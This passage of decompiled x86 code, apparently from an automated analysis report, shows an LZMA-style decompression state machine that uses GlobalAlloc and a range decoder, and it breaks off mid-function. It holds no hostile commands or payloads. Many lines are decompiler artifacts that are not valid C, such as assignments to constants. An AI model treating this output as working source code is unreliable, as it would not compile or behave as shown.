                                      						 *(_t644 - 0x50) = 1;
                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                      						while(1) {
                                      							L149:
                                      							if( *(_t644 - 0x48) <= 0) {
                                      								goto L155;
                                      							}
                                      							L150:
                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                      							 *(_t644 - 0x54) = _t643;
                                      							_t569 =  *_t643;
                                      							_t635 = _t569 & 0x0000ffff;
                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                      							if( *(_t644 - 0xc) >= _t607) {
                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                      								_t628 = _t627 + 1;
                                      								 *_t643 = _t569 - (_t569 >> 5);
                                      								 *(_t644 - 0x50) = _t628;
                                      							} else {
                                      								 *(_t644 - 0x10) = _t607;
                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                      							}
                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                      								L148:
                                      								_t487 = _t644 - 0x48;
                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                      								L149:
                                      								if( *(_t644 - 0x48) <= 0) {
                                      									goto L155;
                                      								}
                                      								goto L150;
                                      							} else {
                                      								L154:
                                      								L146:
                                      								if( *(_t644 - 0x6c) == 0) {
                                      									L169:
                                      									 *(_t644 - 0x88) = 0x18;
                                      									L170:
                                      									_t579 = 0x22;
                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                      									_t539 = 0;
                                      									L172:
                                      									return _t539;
                                      								}
                                      								L147:
                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                      								_t484 = _t644 - 0x70;
                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                      								goto L148;
                                      							}
                                      							L155:
                                      							_t537 =  *(_t644 - 0x7c);
                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                      							while(1) {
                                      								L140:
                                      								 *(_t644 - 0x88) = _t537;
                                      								while(1) {
                                      									L1:
                                      									_t538 =  *(_t644 - 0x88);
                                      									if(_t538 > 0x1c) {
                                      										break;
                                      									}
                                      									L2:
                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                      										case 0:
                                      											L3:
                                      											if( *(_t644 - 0x6c) == 0) {
                                      												goto L170;
                                      											}
                                      											L4:
                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                      											_t538 =  *( *(_t644 - 0x70));
                                      											if(_t538 > 0xe1) {
                                      												goto L171;
                                      											}
                                      											L5:
                                      											_t542 = _t538 & 0x000000ff;
                                      											_push(0x2d);
                                      											asm("cdq");
                                      											_pop(_t581);
                                      											_push(9);
                                      											_pop(_t582);
                                      											_t638 = _t542 / _t581;
                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                      											asm("cdq");
                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                      											 *(_t644 - 0x3c) = _t633;
                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                      												L10:
                                      												if(_t641 == 0) {
                                      													L12:
                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                      													goto L15;
                                      												} else {
                                      													goto L11;
                                      												}
                                      												do {
                                      													L11:
                                      													_t641 = _t641 - 1;
                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                      												} while (_t641 != 0);
                                      												goto L12;
                                      											}
                                      											L6:
                                      											if( *(_t644 - 4) != 0) {
                                      												GlobalFree( *(_t644 - 4));
                                      											}
                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                      											 *(_t644 - 4) = _t538;
                                      											if(_t538 == 0) {
                                      												goto L171;
                                      											} else {
                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                      												goto L10;
                                      											}
                                      										case 1:
                                      											L13:
                                      											__eflags =  *(_t644 - 0x6c);
                                      											if( *(_t644 - 0x6c) == 0) {
                                      												L157:
                                      												 *(_t644 - 0x88) = 1;
                                      												goto L170;
                                      											}
                                      											L14:
                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                      											_t45 = _t644 - 0x48;
                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                      											__eflags =  *_t45;
                                      											L15:
                                      											if( *(_t644 - 0x48) < 4) {
                                      												goto L13;
                                      											}
                                      											L16:
                                      											_t550 =  *(_t644 - 0x40);
                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                      												L20:
                                      												 *(_t644 - 0x48) = 5;
                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                      												goto L23;
                                      											}
                                      											L17:
                                      											 *(_t644 - 0x74) = _t550;
                                      											if( *(_t644 - 8) != 0) {
                                      												GlobalFree( *(_t644 - 8));
                                      											}
                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                      											 *(_t644 - 8) = _t538;
                                      											if(_t538 == 0) {
                                      												goto L171;
                                      											} else {
                                      												goto L20;
                                      											}
                                      										case 2:
                                      											L24:
                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                      											 *(_t644 - 0x84) = 6;
                                      											 *(_t644 - 0x4c) = _t557;
                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                      											goto L132;
                                      										case 3:
                                      											L21:
                                      											__eflags =  *(_t644 - 0x6c);
                                      											if( *(_t644 - 0x6c) == 0) {
                                      												L158:
                                      												 *(_t644 - 0x88) = 3;
                                      												goto L170;
                                      											}
                                      											L22:
                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                      											_t67 = _t644 - 0x70;
                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                      											__eflags =  *_t67;
                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                      											L23:
                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                      											if( *(_t644 - 0x48) != 0) {
                                      												goto L21;
                                      											}
                                      											goto L24;
                                      										case 4:
                                      											L133:
                                      											_t559 =  *_t642;
                                      											_t626 = _t559 & 0x0000ffff;
                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                      											if( *(_t644 - 0xc) >= _t596) {
                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                      												 *(_t644 - 0x40) = 1;
                                      												_t560 = _t559 - (_t559 >> 5);
                                      												__eflags = _t560;
                                      												 *_t642 = _t560;
                                      											} else {
                                      												 *(_t644 - 0x10) = _t596;
                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                      											}
                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                      												goto L139;
                                      											} else {
                                      												goto L137;
                                      											}
                                      										case 5:
                                      											L137:
                                      											if( *(_t644 - 0x6c) == 0) {
                                      												L168:
                                      												 *(_t644 - 0x88) = 5;
                                      												goto L170;
                                      											}
                                      											L138:
                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                      											L139:
                                      											_t537 =  *(_t644 - 0x84);
                                      											L140:
                                      											 *(_t644 - 0x88) = _t537;
                                      											goto L1;
                                      										case 6:
                                      											L25:
                                      											__edx = 0;
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												L36:
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) = 1;
                                      												 *(__ebp - 0x84) = 7;
                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      												goto L132;
                                      											}
                                      											L26:
                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      											__esi =  *(__ebp - 0x60);
                                      											__cl = 8;
                                      											__cl = 8 -  *(__ebp - 0x3c);
                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      											__ecx =  *(__ebp - 0x3c);
                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      											__ecx =  *(__ebp - 4);
                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      											__eflags =  *(__ebp - 0x38) - 4;
                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											if( *(__ebp - 0x38) >= 4) {
                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                      												if( *(__ebp - 0x38) >= 0xa) {
                                      													_t98 = __ebp - 0x38;
                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                      													__eflags =  *_t98;
                                      												} else {
                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      												}
                                      											} else {
                                      												 *(__ebp - 0x38) = 0;
                                      											}
                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                      											if( *(__ebp - 0x34) == __edx) {
                                      												L35:
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												goto L61;
                                      											} else {
                                      												L32:
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__ecx =  *(__ebp - 8);
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      												goto L41;
                                      											}
                                      										case 7:
                                      											L66:
                                      											__eflags =  *(__ebp - 0x40) - 1;
                                      											if( *(__ebp - 0x40) != 1) {
                                      												L68:
                                      												__eax =  *(__ebp - 0x24);
                                      												 *(__ebp - 0x80) = 0x16;
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x28);
                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      												__eax =  *(__ebp - 0x2c);
                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      												__al = __al & 0x000000fd;
                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      												__eax =  *(__ebp - 4);
                                      												__eax =  *(__ebp - 4) + 0x664;
                                      												__eflags = __eax;
                                      												 *(__ebp - 0x58) = __eax;
                                      												goto L69;
                                      											}
                                      											L67:
                                      											__eax =  *(__ebp - 4);
                                      											__ecx =  *(__ebp - 0x38);
                                      											 *(__ebp - 0x84) = 8;
                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      											goto L132;
                                      										case 8:
                                      											L70:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 0xa;
                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      											} else {
                                      												__eax =  *(__ebp - 0x38);
                                      												__ecx =  *(__ebp - 4);
                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                      												 *(__ebp - 0x84) = 9;
                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      											}
                                      											goto L132;
                                      										case 9:
                                      											L73:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												goto L90;
                                      											}
                                      											L74:
                                      											__eflags =  *(__ebp - 0x60);
                                      											if( *(__ebp - 0x60) == 0) {
                                      												goto L171;
                                      											}
                                      											L75:
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                      											__eflags = _t259;
                                      											0 | _t259 = _t259 + _t259 + 9;
                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                      											goto L76;
                                      										case 0xa:
                                      											L82:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												L84:
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 0xb;
                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      												goto L132;
                                      											}
                                      											L83:
                                      											__eax =  *(__ebp - 0x28);
                                      											goto L89;
                                      										case 0xb:
                                      											L85:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__ecx =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x20);
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      											} else {
                                      												__eax =  *(__ebp - 0x24);
                                      											}
                                      											__ecx =  *(__ebp - 0x28);
                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      											L89:
                                      											__ecx =  *(__ebp - 0x2c);
                                      											 *(__ebp - 0x2c) = __eax;
                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      											L90:
                                      											__eax =  *(__ebp - 4);
                                      											 *(__ebp - 0x80) = 0x15;
                                      											__eax =  *(__ebp - 4) + 0xa68;
                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      											goto L69;
                                      										case 0xc:
                                      											L99:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												L164:
                                      												 *(__ebp - 0x88) = 0xc;
                                      												goto L170;
                                      											}
                                      											L100:
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t334 = __ebp - 0x70;
                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t334;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											__eax =  *(__ebp - 0x2c);
                                      											goto L101;
                                      										case 0xd:
                                      											L37:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												L159:
                                      												 *(__ebp - 0x88) = 0xd;
                                      												goto L170;
                                      											}
                                      											L38:
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t122 = __ebp - 0x70;
                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t122;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L39:
                                      											__eax =  *(__ebp - 0x40);
                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      												goto L48;
                                      											}
                                      											L40:
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												goto L54;
                                      											}
                                      											L41:
                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      											 *(__ebp - 0x48) = __eax;
                                      											__eax = __eax + 1;
                                      											__eax = __eax << 8;
                                      											__eax = __eax + __ebx;
                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edx = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												 *(__ebp - 0x40) = 1;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												__ebx = __ebx + __ebx + 1;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edx;
                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L39;
                                      											} else {
                                      												L45:
                                      												goto L37;
                                      											}
                                      										case 0xe:
                                      											L46:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												L160:
                                      												 *(__ebp - 0x88) = 0xe;
                                      												goto L170;
                                      											}
                                      											L47:
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t156 = __ebp - 0x70;
                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t156;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											while(1) {
                                      												L48:
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													break;
                                      												}
                                      												L49:
                                      												__eax =  *(__ebp - 0x58);
                                      												__edx = __ebx + __ebx;
                                      												__ecx =  *(__ebp - 0x10);
                                      												__esi = __edx + __eax;
                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													_t170 = __edx + 1; // 0x1
                                      													__ebx = _t170;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													continue;
                                      												} else {
                                      													L53:
                                      													goto L46;
                                      												}
                                      											}
                                      											L54:
                                      											_t173 = __ebp - 0x34;
                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      											__eflags =  *_t173;
                                      											goto L55;
                                      										case 0xf:
                                      											L58:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												L161:
                                      												 *(__ebp - 0x88) = 0xf;
                                      												goto L170;
                                      											}
                                      											L59:
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t203 = __ebp - 0x70;
                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t203;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L60:
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												L55:
                                      												__al =  *(__ebp - 0x44);
                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      												goto L56;
                                      											}
                                      											L61:
                                      											__eax =  *(__ebp - 0x58);
                                      											__edx = __ebx + __ebx;
                                      											__ecx =  *(__ebp - 0x10);
                                      											__esi = __edx + __eax;
                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edi = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												_t217 = __edx + 1; // 0x1
                                      												__ebx = _t217;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edi;
                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L60;
                                      											} else {
                                      												L65:
                                      												goto L58;
                                      											}
                                      										case 0x10:
                                      											L109:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												L165:
                                      												 *(__ebp - 0x88) = 0x10;
                                      												goto L170;
                                      											}
                                      											L110:
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t365 = __ebp - 0x70;
                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t365;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											goto L111;
                                      										case 0x11:
                                      											L69:
                                      											__esi =  *(__ebp - 0x58);
                                      											 *(__ebp - 0x84) = 0x12;
                                      											goto L132;
                                      										case 0x12:
                                      											L128:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												L131:
                                      												__eax =  *(__ebp - 0x58);
                                      												 *(__ebp - 0x84) = 0x13;
                                      												__esi =  *(__ebp - 0x58) + 2;
                                      												L132:
                                      												 *(_t644 - 0x54) = _t642;
                                      												goto L133;
                                      											}
                                      											L129:
                                      											__eax =  *(__ebp - 0x4c);
                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax =  *(__ebp - 0x4c) << 4;
                                      											__eflags = __eax;
                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                      											goto L130;
                                      										case 0x13:
                                      											L141:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												L143:
                                      												_t469 = __ebp - 0x58;
                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      												__eflags =  *_t469;
                                      												 *(__ebp - 0x30) = 0x10;
                                      												 *(__ebp - 0x40) = 8;
                                      												L144:
                                      												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                      												L145:
                                      												 *(_t644 - 0x50) = 1;
                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                      												goto L149;
                                      											}
                                      											L142:
                                      											__eax =  *(__ebp - 0x4c);
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax =  *(__ebp - 0x4c) << 4;
                                      											 *(__ebp - 0x30) = 8;
                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      											L130:
                                      											 *(__ebp - 0x58) = __eax;
                                      											 *(__ebp - 0x40) = 3;
                                      											goto L144;
                                      										case 0x14:
                                      											L156:
                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      											__eax =  *(__ebp - 0x80);
                                      											while(1) {
                                      												L140:
                                      												 *(_t644 - 0x88) = _t537;
                                      												goto L1;
                                      											}
                                      										case 0x15:
                                      											L91:
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      											__al = __al & 0x000000fd;
                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      											goto L120;
                                      										case 0x16:
                                      											goto L0;
                                      										case 0x17:
                                      											while(1) {
                                      												L145:
                                      												 *(_t644 - 0x50) = 1;
                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
